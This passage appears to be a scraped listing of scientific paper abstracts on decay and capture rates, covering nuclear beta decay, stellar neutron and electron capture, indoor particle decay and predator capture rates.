many times the number of target photons. The highest background rate occurs when the atmosphere is clear, the Sun is high, and the target is a highly reflective surface such as snow. Under these conditions, the total data rate for the 16 channels combined is expected to be approximately 22 million events per second. For each photon detection event, the data capture software reads the relative time of receipt, with respect to a one-per-second absolute time pulse from a GPS receiver, from an event timer card with 0.1-ns precision, and records that information to a RAID (Redundant Array of Independent Disks) storage device. The relative time of laser pulse firings must also be read and recorded with the same precision. Each of the four event timer cards handles the throughput from four of the channels. For each detection event, a flag is 15. Beta-decay rate and beta-delayed neutron emission probability of improved gross theory Koura, Hiroyuki 2014-09-01 A theoretical study has been carried out on beta-decay rate and beta-delayed neutron emission probability. The gross theory of the beta decay is based on an idea of the sum rule of the beta-decay strength function, and has succeeded in describing beta-decay half-lives of nuclei overall nuclear mass region. The gross theory includes not only the allowed transition as the Fermi and the Gamow-Teller, but also the first-forbidden transition. In this work, some improvements are introduced as the nuclear shell correction on nuclear level densities and the nuclear deformation for nuclear strength functions, those effects were not included in the original gross theory. The shell energy and the nuclear deformation for unmeasured nuclei are adopted from the KTUY nuclear mass formula, which is based on the spherical-basis method. Considering the properties of the integrated Fermi function, we can roughly categorized energy region of excited-state of a daughter nucleus into three regions: a highly-excited energy region, which fully affect a delayed neutron probability, a middle energy region, which is estimated to contribute the decay heat, and a region neighboring the ground-state, which determines the beta-decay rate. Some results will be given in the presentation. A theoretical study has been carried out on beta-decay rate and beta-delayed neutron emission probability. The gross theory of the beta decay is based on an idea of the sum rule of the beta-decay strength function, and has succeeded in describing beta-decay half-lives of nuclei overall nuclear mass region. The gross theory includes not only the allowed transition as the Fermi and the Gamow-Teller, but also the first-forbidden transition. In this work, some improvements are introduced as the nuclear shell correction on nuclear level densities and the nuclear deformation for nuclear strength functions, those effects were not included in the original gross theory. The shell energy and the nuclear deformation for 16. Measurement of the decay rate of the SiH feature as a function of temperature NASA Technical Reports Server (NTRS) Nuth, Joseph A., III; Kraus, George F. 1994-01-01 We have previously suggested that the SiH fundamental stretch could serve as a diagnostic indicator of the oxidation state of silicate surfaces exposed to the solar wind for prolonged periods. We have now measured the primary decay rate of SiH in vacuo as a function of temperature and find that the primary rate constant for the decay can be characterized by the following equation: k(min(exp -1)) approximately equals 0.186 exp(-9/RT) min(exp -1), where R = 2 x 10(exp -3) kcal deg(exp -1) mole(exp -1). This means that the half-life for the decay of the SiH feature at room temperature is approximately 20 yrs, whereas the half-life at a peak lunar regolith temperature of approximately 500K would be only approximately 20 days. At the somewhat lower temperature of approximately 400K the half-life for the decay is on the order of 200 days. The rate of loss of SiH as a function of temperature provides an upper limit to the quantity of H implanted by the solar wind which can be retained by a silicate grain in a planetary regolith. This will be discussed in more detail here. 17. Note on intrinsic decay rates for abstract wave equations with memory Lasiecka, Irena; Messaoudi, Salim A.; Mustafa, Muhammad I. 2013-03-01 In this paper we consider a viscoelastic abstract wave equation with memory kernel satisfying the inequality g' + H(g) ⩽ 0, s ⩾ 0 where H(s) is a given continuous, positive, increasing, and convex function such that H(0) = 0. We shall develop an intrinsic method, based on the main idea introduced by Lasiecka and Tataru ["Uniform boundary stabilization of semilinear wave equation with nonlinear boundary dissipation," Differential and Integral Equations 6, 507-533 (1993)], for determining decay rates of the energy given in terms of the function H(s). This will be accomplished by expressing the decay rates as a solution to a given nonlinear dissipative ODE. We shall show that the obtained result, while generalizing previous results obtained in the literature, is also capable of proving optimal decay rates for polynomially decaying memory kernels (H(s) ˜ sp) and for the full range of admissible parameters p ∈ [1, 2). While such result has been known for certain restrictive ranges of the parameters p ∈ [1, 3/2), the methods introduced previously break down when p ⩾ 3/2. The present paper develops a new and general tool that is applicable to all admissible parameters. 18. Characterization of decay and emission rates of ultrafine particles in indoor ice rink. PubMed Kim, J; Lee, K 2013-08-01 The purposes of this study were to determine indoor ultrafine particle (UFP, diameter <100 nm) levels in ice rinks and to characterize UFP decay and emission rates. All 15 public ice rinks in Seoul were investigated for UFP and carbon monoxide (CO) concentrations. Three ice rinks did not show peaks in UFP concentrations, and one ice rink used two resurfacers simultaneously. High peaks of UFP and CO concentrations were observed when the resurfacer was operated. The average air change rate in the 11 ice rinks was 0.21 ± 0.13/h. The average decay rates of UFP number concentrations measured by the P-Trak and DiSCmini were 0.54 ± 0.21/h and 0.85 ± 0.34/h, respectively. The average decay rate of UFP surface area concentration was 0.33 ± 0.15/h. The average emission rates of UFP number concentrations measured by P-Trak and DiSCmini were 1.2 × 10(14) ± 6.5 × 10(13) particles/min and 3.3 × 10(14) ± 2.4 × 10(14) particles/min, respectively. The average emission rate of UFP surface area concentration was 3.1 × 10(11) ± 2.0 × 10(11) μm(2)/min. UFP emission rate was associated with resurfacer age. DiSCmini measured higher decay and emission rates than P-Trak due to their different measuring mechanisms and size ranges. 19. Neutron Capture Rates near A=130 which Effect a Global Change to the r-Process Abundance Distribution SciTech Connect Surman, Rebecca; Beun, Joshua; Mclaughlin, Gail C; Hix, William Raphael 2009-01-01 We investigate the impact of neutron capture rates near the A=130 peak on the r-process abundance pattern. We show that these capture rates can alter the abundances of individual nuclear species, not only in the region of A=130 peak but also throughout the abundance pattern. We discuss in general the nonequilibrium processes that produce these abundance changes and determine which capture rates have the most significant impact. 20. A comprehensive study of Interatomic Coulombic Decay in argon dimers: Extracting R-dependent absolute decay rates from the experiment SciTech Connect Rist, J.; Miteva, T.; Gaire, B.; Sann, H.; Trinter, F.; Keiling, M.; Gehrken, N.; Moradmand, A.; Berry, B.; Zohrabi, M.; Kunitski, M.; Ben-Itzhak, I.; Belkacem, A.; Weber, T.; Landers, A. L.; Schöffler, M.; Williams, J. B.; Kolorenč, P.; Gokhberg, K.; Jahnke, T.; Dörner, R. 2016-09-15 In this paper we present a comprehensive and detailed study of Interatomic Coulombic Decay (ICD) occurring after irradiating argon dimers with XUV-synchrotron radiation. A manifold of different decay channels is observed and the corresponding initial and final states are assigned. Additionally, the effect of nuclear dynamics on the ICD electron spectrum is examined for one specific decay channel. The internuclear distance-dependent width Γ(R) of the decay is obtained from the measured kinetic energy release distribution of the ions employing a classical nuclear dynamics model. 1. Determination of the neutron-capture rate of 17C for r -process nucleosynthesis Heine, M.; Typel, S.; Wu, M.-R.; Adachi, T.; Aksyutina, Y.; Alcantara, J.; Altstadt, S.; Alvarez-Pol, H.; Ashwood, N.; Atar, L.; Aumann, T.; Avdeichikov, V.; Barr, M.; Beceiro-Novo, S.; Bemmerer, D.; Benlliure, J.; Bertulani, C. A.; Boretzky, K.; Borge, M. J. G.; Burgunder, G.; Caamano, M.; Caesar, C.; Casarejos, E.; Catford, W.; Cederkäll, J.; Chakraborty, S.; Chartier, M.; Chulkov, L. V.; Cortina-Gil, D.; Crespo, R.; Datta Pramanik, U.; Diaz Fernandez, P.; Dillmann, I.; Elekes, Z.; Enders, J.; Ershova, O.; Estrade, A.; Farinon, F.; Fraile, L. M.; Freer, M.; Freudenberger, M.; Fynbo, H. O. U.; Galaviz, D.; Geissel, H.; Gernhäuser, R.; Göbel, K.; Golubev, P.; Gonzalez Diaz, D.; Hagdahl, J.; Heftrich, T.; Heil, M.; Heinz, A.; Henriques, A.; Holl, M.; Ickert, G.; Ignatov, A.; Jakobsson, B.; Johansson, H. T.; Jonson, B.; Kalantar-Nayestanaki, N.; Kanungo, R.; Kelic-Heil, A.; Knöbel, R.; Kröll, T.; Krücken, R.; Kurcewicz, J.; Kurz, N.; Labiche, M.; Langer, C.; Le Bleis, T.; Lemmon, R.; Lepyoshkina, O.; Lindberg, S.; Machado, J.; Marganiec, J.; Martínez-Pinedo, G.; Maroussov, V.; Mostazo, M.; Movsesyan, A.; Najafi, A.; Neff, T.; Nilsson, T.; Nociforo, C.; Panin, V.; Paschalis, S.; Perea, A.; Petri, M.; Pietri, S.; Plag, R.; Prochazka, A.; Rahaman, A.; Rastrepina, G.; Reifarth, R.; Ribeiro, G.; Ricciardi, M. V.; Rigollet, C.; Riisager, K.; Röder, M.; Rossi, D.; Sanchez del Rio, J.; Savran, D.; Scheit, H.; Simon, H.; Sorlin, O.; Stoica, V.; Streicher, B.; Taylor, J. T.; Tengblad, O.; Terashima, S.; Thies, R.; Togano, Y.; Uberseder, E.; Van de Walle, J.; Velho, P.; Volkov, V.; Wagner, A.; Wamers, F.; Weick, H.; Weigand, M.; Wheldon, C.; Wilson, G.; Wimmer, C.; Winfield, J. S.; Woods, P.; Yakorev, D.; Zhukov, M. V.; Zilges, A.; Zuber, K.; R3B Collaboration 2017-01-01 With the R 3B -LAND setup at GSI we have measured exclusive relative-energy spectra of the Coulomb dissociation of 18C at a projectile energy around 425 A MeV on a lead target, which are needed to determine the radiative neutron-capture cross sections of 17C into the ground state of 18C. Those data have been used to constrain theoretical calculations for transitions populating excited states in 18C. This allowed to derive the astrophysical cross section σnγ * accounting for the thermal population of 17C target states in astrophysical scenarios. The experimentally verified capture rate is significantly lower than those of previously obtained Hauser-Feshbach estimations at temperatures T9≤ 1 GK. Network simulations with updated neutron-capture rates and hydrodynamics according to the neutrino-driven wind model as well as the neutron-star merger scenario reveal no pronounced influence of neutron capture of 17C on the production of second- and third-peak elements in contrast to earlier sensitivity studies. 2. Well hydraulics in pumping tests with exponentially decayed rates of abstraction in confined aquifers Wen, Zhang; Zhan, Hongbin; Wang, Quanrong; Liang, Xing; Ma, Teng; Chen, Chen 2017-05-01 Actual field pumping tests often involve variable pumping rates which cannot be handled by the classical constant-rate or constant-head test models, and often require a convolution process to interpret the test data. In this study, we proposed a semi-analytical model considering an exponentially decreasing pumping rate started at a certain (higher) rate and eventually stabilized at a certain (lower) rate for cases with or without wellbore storage. A striking new feature of the pumping test with an exponentially decayed rate is that the drawdowns will decrease over a certain period of time during intermediate pumping stage, which has never been seen before in constant-rate or constant-head pumping tests. It was found that the drawdown-time curve associated with an exponentially decayed pumping rate function was bounded by two asymptotic curves of the constant-rate tests with rates equaling to the starting and stabilizing rates, respectively. The wellbore storage must be considered for a pumping test without an observation well (single-well test). Based on such characteristics of the time-drawdown curve, we developed a new method to estimate the aquifer parameters by using the genetic algorithm. 3. Rate-based process modeling study of CO{sub 2} capture with aqueous monoethanolamine solution SciTech Connect Zhang, Y.; Chen, H.; Chen, C.C.; Plaza, J.M.; Dugas, R.; Rochelle, G.T. 2009-10-15 Rate-based process modeling technology has matured and is increasingly gaining acceptance over traditional equilibrium-stage modeling approaches. Recently comprehensive pilot plant data for carbon dioxide (CO{sub 2}) capture with aqueous monoethanolamine (MEA) solution have become available from the University of Texas at Austin. The pilot plant data cover key process variables including CO{sub 2} concentration in the gas stream, CO{sub 2} loading in lean MEA solution, liquid to gas ratio, and packing type. In this study, we model the pilot plant operation with Aspen RateSep, a second generation rate-based multistage separation unit operation model in Aspen Plus. After a brief review of rate-based modeling, thermodynamic and kinetic models for CO{sub 2} absorption with the MEA solution, and transport property models, we show excellent match of the rate-based model predictions against the comprehensive pilot plant data and we validate the superiority of the rate-based models over the traditional equilibrium-stage models. We further examine the impacts of key rate-based modeling options, i.e., film discretization options and flow model options. The rate-based model provides excellent predictive capability, and it should be very useful for design and scale-up of CO{sub 2} capture processes. 4. Electron-capture Rates for pf-shell Nuclei in Stellar Environments and Nucleosynthesis Suzuki, Toshio; Honma, Michio; Mori, Kanji; Famiano, Michael A.; Kajino, Toshitaka; Hidakai, Jun; Otsuka, Takaharu Gamow-Teller strengths in pf-shell nuclei obtained by a new shell-model Hamltonian, GXPF1J, are used to evaluate electron-capture rates in pf-shell nuclei at stellar environments. The nuclear weak rates with GXPF1J, which are generally smaller than previous evaluations for proton-rich nuclei, are applied to nucleosynthesis in type Ia supernova explosions. The updated rates are found to lead to less production of neutron-rich nuclei such as 58Ni and 54Cr, thus toward a solution of the problem of over-production of neutron-rich isotopes of iron-group nuclei compared to the solar abundance. 5. Fine-grid calculations for stellar electron and positron capture rates on Fe isotopes SciTech Connect Nabi, Jameel-Un; Tawfik, Abdel Nasser 2013-03-15 The acquisition of precise and reliable nuclear data is a prerequisite to success for stellar evolution and nucleosynthesis studies. Core-collapse simulators find it challenging to generate an explosion from the collapse of the core of massive stars. It is believed that a better understanding of the microphysics of core-collapse can lead to successful results. The weak interaction processes are able to trigger the collapse and control the lepton-to-baryon ratio (Y{sub e}) of the corematerial. It is suggested that the temporal variation of Y{sub e} within the core of a massive star has a pivotal role to play in the stellar evolution and a fine-tuning of this parameter at various stages of presupernova evolution is the key to generate an explosion. During the presupernova evolution of massive stars, isotopes of iron, mainly {sup 54-56}Fe, are considered to be key players in controlling Y{sub e} ratio via electron capture on these nuclides. Recently an improved microscopic calculation of weak-interaction-mediated rates for iron isotopes was introduced using the proton-neutron quasiparticle random-phase-approximation (pn-QRPA) theory. The pn-QRPA theory allows a microscopic state-by-state calculation of stellar capture rates which greatly increases the reliability of calculated rates. The results were suggestive of some fine-tuning of the Y{sub e} ratio during various phases of stellar evolution. Here we present for the first time the fine-grid calculation of the electron and positron capture rates on {sup 54-56}Fe. The sensitivity of the pn-QRPA calculated capture rates to the deformation parameter is also studied in this work. Core-collapse simulators may find this calculation suitable for interpolation purposes and for necessary incorporation in the stellar evolution codes. 6. Core hole screening and decay rates of double core ionized first row hydrides. PubMed Inhester, L; Groenhof, G; Grubmüller, H 2013-04-28 Because of the high intensity, X-ray free electron lasers allow one to create and probe double core ionized states in molecules. The decay of these multiple core ionized states crucially determines the evolution of radiation damage in single molecule diffractive imaging experiments. Here we have studied the Auger decay in hydrides of first row elements after single and double core ionization by quantum mechanical ab initio calculations. In our approach the continuum wave function of the emitted Auger electron is expanded into spherical harmonics on a radial grid. The obtained decay rates of double K-shell vacancies were found to be systematically larger than those for the respective single K-shell vacancies, markedly exceeding the expected factor of two. This enhancement is attributed to the screening effects induced by the core hole. We propose a simple model, which is able to predict core hole decay rates in molecules with low Z elements based on the electron density in the vicinity of the core hole. 7. Polynomial decay rate of a thermoelastic Mindlin-Timoshenko plate model with Dirichlet boundary conditions Grobbelaar-Van Dalsen, Marié 2015-02-01 In this article, we are concerned with the polynomial stabilization of a two-dimensional thermoelastic Mindlin-Timoshenko plate model with no mechanical damping. The model is subject to Dirichlet boundary conditions on the elastic as well as the thermal variables. The work complements our earlier work in Grobbelaar-Van Dalsen (Z Angew Math Phys 64:1305-1325, 2013) on the polynomial stabilization of a Mindlin-Timoshenko model in a radially symmetric domain under Dirichlet boundary conditions on the displacement and thermal variables and free boundary conditions on the shear angle variables. In particular, our aim is to investigate the effect of the Dirichlet boundary conditions on all the variables on the polynomial decay rate of the model. By once more applying a frequency domain method in which we make critical use of an inequality for the trace of Sobolev functions on the boundary of a bounded, open connected set we show that the decay is slower than in the model considered in the cited work. A comparison of our result with our polynomial decay result for a magnetoelastic Mindlin-Timoshenko model subject to Dirichlet boundary conditions on the elastic variables in Grobbelaar-Van Dalsen (Z Angew Math Phys 63:1047-1065, 2012) also indicates a correlation between the robustness of the coupling between parabolic and hyperbolic dynamics and the polynomial decay rate in the two models. 8. A study of the fully differential inclusive semileptonic B meson decay rate Lipeles, Elliot 2004-12-01 We present a study of the fully differential inclusive semileptonic B meson decay rate. Using a maximum likelihood fit, we extract the fractional contributions from the B → X clnu processes with Xc = D, D*, D**, and nonresonant Xc, and the process B → Xulnu. From the fit results, we extract moments of B → Xclnu differential decay rate and the partial branching fraction of the B → Xulnu decay in a restricted region of phase space. The region in which the B → Xulnu partial branching fraction is measured is MX < 1.5 GeV/c2, q2 > 11 GeV2/c4. This measurement is used to extract CKM parameter |Vub| = (4.73 +/- 0.23 +/- 0.82 +/- 0.18 +/- 0.56 +/- 0.66) x 10-3, where the uncertainties are due to statistics, detector systematics, B → Xcl nu model dependence, B → Xulnu model dependence, and theoretical uncertainties. From the < M2X-M2D > moment, the first moment of the photon energy spectrum in B → Xsgamma, and the semileptonic B branching fraction, we extract the CKM parameter |V cb| = (4.12 +/- .10 +/- 0.09 +/- 0.16) x 10-2, where the uncertainties are due to the measurement of the semileptonic B decay rate, the moments measurements, and theoretical uncertainties. Both CKM parameter extractions use Heavy Quark Effective Theory (HQET) predictions for inclusive semileptonic B decay. The measured moments are also used to test related predictions. 9. A capture-rate model of net-spinning caddisfly communities. PubMed 1987-03-01 Empirical research suggests that net-spinning caddisflies require two basic resources, suspended particulate foods, and the currents which deliver them. I present a theoretical model of caddisfly communities based on quantitative differences in the capture rate produced by different catchnet designs. It assumes that catchnet architecture reflects a tradeoff between water filtration rate (flux through the net) and capture efficiency (the proportion of suspended items retained), and that the marginal resource concentration required by species with different catchnet morphologies should reflect the product of these parameters. The model hypothesizes a) that downstream changes in the physical morphology of the stream channel cause a shift in the relative importance of population limitations imposed by food and current-substrate availability, b) that the interaction of these physical changes with the filtering biota results in a seston resource gradient, and c) that the distribution of each taxon along this resource gradient reflects a marginal resource requirement determined by the functional morphology of its catchnet. 10. Informing Neutron-Capture Rates through (d,p) Reactions on Neutron-Rich Tin Isotopes Manning, B.; Cizewski, J. A.; Kozub, R. L.; Ahn, S.; Allmond, J. M.; Bardayan, D. W.; Chae, K. Y.; Chipps, K. A.; Howard, M. E.; Jones, K. L.; Liang, J. F.; Matos, M.; Nunes, F. M.; Nesaraja, C. D.; O'Malley, P. D.; Pain, S. D.; Peters, W. A.; Pittman, S. T.; Ratkiewicz, A.; Schmitt, K. T.; Shapira, D.; Smith, M. S.; Titus, L. 2014-03-01 Level energies and spectroscopic information for neutron-rich nuclei provide important input for r-process nucleosynthesis calculations; specifically, the location and strength of single-neutron l = 1 states when calculating neutron-capture rates. Surman and collaborators have performed sensitivity studies to show that varying neutron-capture rates can significantly alter final r-process abundances. However, there are many nuclei important to the r-process that cannot be studied. Extending studies to more neutron-rich nuclei will help constrain the nuclear shell-model in extrapolating to nuclei even further from stability. The (d,p) reaction has been measured with radioactive ion beams of 126Sn and 128Sn to complete the set of (d,p) studies on even mass tin isotopes from doubly-magic 132 to stable 124Sn. Work supported in part by the U.S. Department of Energy and National Science Foundation. 11. Rates for neutron-capture reactions on tungsten isotopes in iron meteorites. [Abstract only NASA Technical Reports Server (NTRS) Masarik, J.; Reedy, R. C. 1994-01-01 High-precision W isotopic analyses by Harper and Jacobsen indicate the W-182/W-183 ratio in the Toluca iron meteorite is shifted by -(3.0 +/- 0.9) x 10(exp -4) relative to a terrestrial standard. Possible causes of this shift are neutron-capture reactions on W during Toluca's approximately 600-Ma exposure to cosmic ray particles or radiogenic growth of W-182 from 9-Ma Hf-182 in the silicate portion of the Earth after removal of W to the Earth's core. Calculations for the rates of neutron-capture reactions on W isotopes were done to study the first possibility. The LAHET Code System (LCS) which consists of the Los Alamos High Energy Transport (LAHET) code and the Monte Carlo N-Particle(MCNP) transport code was used to numerically simulate the irradiation of the Toluca iron meteorite by galactic-cosmic-ray (GCR) particles and to calculate the rates of W(n, gamma) reactions. Toluca was modeled as a 3.9-m-radius sphere with the composition of a typical IA iron meteorite. The incident GCR protons and their interactions were modeled with LAHET, which also handled the interactions of neutrons with energies above 20 MeV. The rates for the capture of neutrons by W-182, W-183, and W-186 were calculated using the detailed library of (n, gamma) cross sections in MCNP. For this study of the possible effect of W(n, gamma) reactions on W isotope systematics, we consider the peak rates. The calculated maximum change in the normalized W-182/W-183 ratio due to neutron-capture reactions cannot account for more than 25% of the mass 182 deficit observed in Toluca W. 12. β+ Gamow-Teller transition strengths from 46Ti and stellar electron-capture rates. PubMed Noji, S; Zegers, R G T; Austin, Sam M; Baugher, T; Bazin, D; Brown, B A; Campbell, C M; Cole, A L; Doster, H J; Gade, A; Guess, C J; Gupta, S; Hitt, G W; Langer, C; Lipschutz, S; Lunderberg, E; Meharchand, R; Meisel, Z; Perdikakis, G; Pereira, J; Recchia, F; Schatz, H; Scott, M; Stroberg, S R; Sullivan, C; Valdez, L; Walz, C; Weisshaar, D; Williams, S J; Wimmer, K 2014-06-27 The Gamow-Teller strength in the β(+) direction to (46)Sc was extracted via the (46)Ti(t,(3)He + γ) reaction at 115  MeV/u. The γ-ray coincidences served to precisely measure the very weak Gamow-Teller transition to a final state at 991 keV. Although this transition is weak, it is crucial for accurately estimating electron-capture rates in astrophysical scenarios with relatively low stellar densities and temperatures, such as presupernova stellar evolution. Shell-model calculations with different effective interactions in the pf shell-model space do not reproduce the experimental Gamow-Teller strengths, which is likely due to sd-shell admixtures. Calculations in the quasiparticle random phase approximation that are often used in astrophysical simulations also fail to reproduce the experimental Gamow-Teller strength distribution, leading to strongly overestimated electron-capture rates. Because reliable theoretical predictions of Gamow-Teller strengths are important for providing astrophysical electron-capture reaction rates for a broad set of nuclei in the lower pf shell, we conclude that further theoretical improvements are required to match astrophysical needs. 13. β+ Gamow-Teller Transition Strengths from Ti46 and Stellar Electron-Capture Rates Noji, S.; Zegers, R. G. T.; Austin, Sam M.; Baugher, T.; Bazin, D.; Brown, B. A.; Campbell, C. M.; Cole, A. L.; Doster, H. J.; Gade, A.; Guess, C. J.; Gupta, S.; Hitt, G. W.; Langer, C.; Lipschutz, S.; Lunderberg, E.; Meharchand, R.; Meisel, Z.; Perdikakis, G.; Pereira, J.; Recchia, F.; Schatz, H.; Scott, M.; Stroberg, S. R.; Sullivan, C.; Valdez, L.; Walz, C.; Weisshaar, D.; Williams, S. J.; Wimmer, K. 2014-06-01 The Gamow-Teller strength in the β+ direction to Sc46 was extracted via the Ti46(t ,He3+γ) reaction at 115 MeV /u. The γ-ray coincidences served to precisely measure the very weak Gamow-Teller transition to a final state at 991 keV. Although this transition is weak, it is crucial for accurately estimating electron-capture rates in astrophysical scenarios with relatively low stellar densities and temperatures, such as presupernova stellar evolution. Shell-model calculations with different effective interactions in the pf shell-model space do not reproduce the experimental Gamow-Teller strengths, which is likely due to sd-shell admixtures. Calculations in the quasiparticle random phase approximation that are often used in astrophysical simulations also fail to reproduce the experimental Gamow-Teller strength distribution, leading to strongly overestimated electron-capture rates. Because reliable theoretical predictions of Gamow-Teller strengths are important for providing astrophysical electron-capture reaction rates for a broad set of nuclei in the lower pf shell, we conclude that further theoretical improvements are required to match astrophysical needs. 14. A predator equalizes rate of capture of a schooling prey in a patchy environment. PubMed Vijayan, Sundararaj; Kotler, Burt P; Abramsky, Zvika 2017-05-01 Prey individuals are often distributed heterogeneously in the environment, and their abundances and relative availabilities vary among patches. A foraging predator should maximize energetic gains by selectively choosing patches with higher prey density. However, catching behaviorally responsive and group-forming prey in patchy environments can be a challenge for predators. First, they have to identify the profitable patches, and second, they must manage the prey's sophisticated anti-predator behavior. Thus, the forager and its prey have to continuously adjust their behavior to that of their opponent. Given these conditions, the foraging predator's behavior should be dynamic with time in terms of foraging effort and prey capture rates across different patches. Theoretically, the allocation of its time among patches of behaviorally responsive prey should be such that it equalizes its prey capture rates across patches through time. We tested this prediction in a model system containing a predator (little egret) and group-forming prey (common gold fish) in two sets of experiments in which (1) patches (pools) contained equal numbers of prey, or in which (2) patches contained unequal densities of prey. The egret equalized the prey capture rate through time in both equal and different density experiments. Copyright © 2017 Elsevier B.V. All rights reserved. 15. A Measurement of the Rate of Muon Capture in Hydrogen Gas andDetermination of the Proton's Induced Pseudoscalar Coupling gP SciTech Connect Banks, Thomas Ira 2007-07-01 This dissertation describes a measurement of the rate ofnuclear muon capture by the proton, performed by the MuCap Collaborationusing a new technique based on a time projection chamber operating inultraclean, deuterium-depleted hydrogen gas at room temperature and 1 MPapressure. The hydrogen target's low gas density of 1 percent compared toliquid hydrogen is key to avoiding uncertainties that arise from theformation of muonic molecules. The capture rate was obtained from thedifference between the μ- disappearance rate in hydrogen--as determinedfrom data collected in the experiment's first physics run in fall2004--and the world averagefor the μ+ decay rate. After combining theresults of my analysis with the results from another independent analysisof the 2004 data, the muon capture rate from the hyperfine singlet groundstate of the mu-p atom is found to be ΛS = 725.0 ± 17.4 1/s, fromwhich the induced pseudoscalar coupling of the nucleon, gP(q2 = -0.88m$2\\atop{μ}$)= 7.3 ± 1.1, is extracted. This result for gP is consistent withtheoretical predictions that are based on the approximate chiral symmetryof QCD. 16. Analytic heating rate of neutron star merger ejecta derived from Fermi's theory of beta decay Hotokezaka, Kenta; Sari, Re'em; Piran, Tsvi 2017-06-01 Macronovae (kilonovae) that arise in binary neutron star mergers are powered by radioactive beta decay of hundreds of r-process nuclides. We derive, using Fermi's theory of beta decay, an analytic estimate of the nuclear heating rate. We show that the heating rate evolves as a power law ranging between t-6/5 and t-4/3. The overall magnitude of the heating rate is determined by the mean values of nuclear quantities, e.g. the nuclear matrix elements of beta decay. These values are specified by using nuclear experimental data. We discuss the role of higher order beta transitions and the robustness of the power law. The robust and simple form of the heating rate suggests that observations of the late-time bolometric light curve ∝ t-4/3 would be direct evidence of a r-process driven macronova. Such observations could also enable us to estimate the total amount of r-process nuclei produced in the merger. 17. Short term memory bowing effect is consistent with presentation rate dependent decay PubMed Central 2010-01-01 I reanalyze the free recall data of Murdock, J Exp Psychol 64(5):482–488 (1962) and Murdock and Okada, J Verbal Learn and Verbal Behav 86:263–267 (1970) which show the famous bowing effect in which initial and recent items are recalled better than intermediate items (primacy and recency effects). Recent item recall probabilities follow a logarithmic decay with time of recall consistent with the tagging/retagging theory. The slope of the decay increases with increasing presentation rate. The initial items, with an effectively low presentation rate, decay with the slowest logarithmic slope, explaining the primacy effect. The finding that presentation rate limits the duration of short term memory suggests a basis for memory loss in busy adults, for the importance of slow music practice, for long term memory deficiencies for people with attention deficits who may be artificially increasing the presentation rates of their surroundings. A well-defined, quantitative measure of the primacy effect is introduced. PMID:22132046 18. Rates and C P asymmetries of charmless two-body baryonic Bu ,d ,s decays Chua, Chun-Khiang 2017-05-01 With the experimental evidences of B¯ 0→p p ¯ and B-→Λ p ¯ decays, it is now possible to extract both tree and penguin amplitudes of the charmless two-body baryonic B decays for the first time. The extracted penguin-tree ratio agrees with the expectation. Using the topological amplitude approach with the experimental results on B¯ 0→p p ¯ and B-→Λ p ¯ decay rates as input, predictions on all other B¯ q→B B ¯ , B D ¯ , D B ¯ and D D ¯ decay rates, where B and D are the low lying octet and decuplet baryons, respectively, are given. It is nontrivial that the results do not violate any existing experimental upper limit. From the analysis it is understandable that why B¯ 0→p p ¯ and B-→Λ p ¯ modes are the first two modes with experimental evidences. Relations on rates are verified using the numerical results. We note that the predicted B-→p Δ++ ¯ rate is close to the experimental bound, which has not been updated in the last ten years. Direct C P asymmetries of all B¯q→B B ¯, B D ¯, D B ¯ and D D ¯ modes are explored. Relations on C P asymmetries are examined using the numerical results. The direct C P asymmetry of B¯ 0→p p ¯ decay can be as large as ±50 %. Some of the C P asymmetries can serve as tests of the Standard Model. Most of them are pure penguin modes, which are expected to be sensitive to new physics contributions. In particular, B¯s 0→Ξ-Ξ- ¯ , B¯ 0→Ξ-Σ*- ¯ , B¯ 0→Ω-Ξ- ¯ , B¯s 0→Σ*-Σ*- ¯ , B¯s 0→Ω-Ω- ¯ , B¯s 0→Ξ-Ξ*- ¯ , B¯s 0→Ξ*-Ξ- ¯ , B¯ 0→Ξ*-Σ*- ¯ , B¯ 0→Ω-Ξ*- ¯ and B¯s 0→Ξ*-Ξ*- ¯ decays are Δ S =-1 pure penguin modes with unsuppressed rates, which can be searched in the near future. Their C P asymmetries are constrained to be of few % and are good candidates to be added to the list of the tests of the Standard Model. 19. Bayesian meta-analysis to synthesize decay rate constant estimates for common fecal indicator bacteria. PubMed Brooks, Lauren E; Field, Katharine G 2016-11-01 20. Optimal decay rates of classical solutions for the full compressible MHD equations Gao, Jincheng; Tao, Qiang; Yao, Zheng-an 2016-04-01 In this paper, we are concerned with optimal decay rates for higher-order spatial derivatives of classical solutions to the full compressible MHD equations in three-dimensional whole space. If the initial perturbation is small in {H^3}-norm and bounded in {L^q(qin [1, 6/5 ))}-norm, we apply the Fourier splitting method by Schonbek (Arch Ration Mech Anal 88:209-222, 1985) to establish optimal decay rates for the second-order spatial derivatives of solutions and the third-order spatial derivatives of magnetic field in {L^2}-norm. These results improve the work of Pu and Guo (Z Angew Math Phys 64:519-538, 2013). 1. Relativistic two-photon decay rates of 2s12 hydrogenic ions Goldman, S. P.; Drake, G. W. F. 1981-07-01 Rates are calculated for the decay of metastable 2s12 ions to the ground state by the simultaneous emission of two photons. The calculation includes all relativistic and retardation effects, and all combinations of photon multipoles which make significant contributions up to Z=100. Summations over intermediate states are performed by constructing a finite-basis-set representation of the Dirac Green's function. The estimated accuracy of the results is +/- 10 ppm for all Z up to 100. The decay rates are about 20 (αZ)2% larger than an earlier calculation by Johnson owing to the inclusion of higher-order retardation effects. The general question of gauge invariance in two-photon transitions is discussed. 2. Casimir-Polder shift and decay rate in the presence of nonreciprocal media Fuchs, Sebastian; Crosse, J. A.; Buhmann, Stefan Yoshi 2017-02-01 We calculate the Casimir-Polder frequency shift and decay rate for an atom in front of a nonreciprocal medium by using macroscopic quantum electrodynamics. The results are a generalization of the respective quantities for matter with broken time-reversal symmetry which does not fulfill the Lorentz reciprocity principle. As examples, we contrast the decay rates, the resonant and nonresonant frequency shifts of a perfectly conducting (reciprocal) mirror with those of a perfectly reflecting nonreciprocal mirror. We find different power laws for the distance dependence of all quantities in the retarded and nonretarded limits. As an example of a more realistic nonreciprocal medium, we investigate a topological insulator subject to a time-symmetry-breaking perturbation. 3. The electron temperature and 44Ti decay rate in Cassiopeia A Laming, J. Martin 2001-11-01 The effects of plasma elemental composition and ionization state on the effective decay rate of 44Ti are investigated. We essentially follow the methods of the first authors to treat this topic, Mochizuki et al., but use more realistic plasma models, including radiative cooling, to compute the evolution of the charge state distribution behind the reverse shock. For uniform density ejecta (i.e., no clumps or bubbles) we find a negligible change to the decay rate of 44Ti. We discuss the effects of non-uniform ejecta. We also briefly consider the effects on these calculations of collisionless electron heating associated with weak secondary shocks propagating throughout the Cas A shell as a result of foward or reverse shock encounters with density inhomogeneities, recently suggested as an explanation for the hard X-ray tail seen in BeppoSAX and RXTE/OSSE spectra. . 4. 